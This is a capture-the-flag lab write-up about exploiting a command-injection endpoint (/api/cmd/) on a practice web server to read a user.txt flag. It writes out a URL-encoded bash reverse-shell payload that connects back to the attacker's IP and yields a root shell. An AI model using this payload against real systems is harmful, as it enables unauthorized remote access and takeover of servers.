Another day, another hack from the Christmas Monster. Can you get back control of the system?
Access the web server on http://[your-ip]:3000/
McSkidy actually found something interesting on the /api/cmd endpoint.
Check out the supporting material here.
Setup
```
kali@kali:~$ curl http://10.10.79.41:3000/api/ls
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /api/ls</pre>
</body>
</html>

kali@kali:~$ curl http://10.10.79.41:3000/api/cmd/ls
{"stdout":"bin\nboot\ndata\ndev\netc\nhome\nlib\nlib64\nlocal\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n","stderr":""}
```
Whatever follows /api/cmd/ is executed on the box and the JSON reply carries its stdout and stderr, so the next step is a reverse shell. Start a listener on the attacking machine (10.9.45.74, port 9999) first; the HTTP request itself will not return while the shell is alive, because the endpoint only answers once the command exits. The payload we want to run on the target is:

```
curl http://10.10.79.41:3000/api/cmd/bash -i >& /dev/tcp/10.9.45.74/9999 0>&1
```

Typed like that it does not work: the local shell treats `>&` and `0>&1` as redirections of curl's own output, and the slashes in `/dev/tcp/...` would be routed as extra path segments. The spaces, redirections and slashes therefore have to be URL-encoded so the whole command travels as a single path segment:

```
curl http://10.10.79.41:3000/api/cmd/bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.45.74%2F9999%200%3E%261
```
#1 What are the contents of the user.txt file?
The shell comes back as root. Locating the flag (the fontconfig hit is just a substring match on the name):

```
[root@ip-10-10-79-41 /] find / | grep -i "user.txt"

/usr/share/doc/fontconfig-2.10.95/fontconfig-user.txt
"/home/bestadmin/user.txt"
```

The command is echoed back because the reverse shell has no tty:

```
[root@ip-10-10-79-41 /] cat /home/bestadmin/user.txt
cat /home/bestadmin/user.txt
"5W7WkjxBWwhe3RNsWJ3Q"
```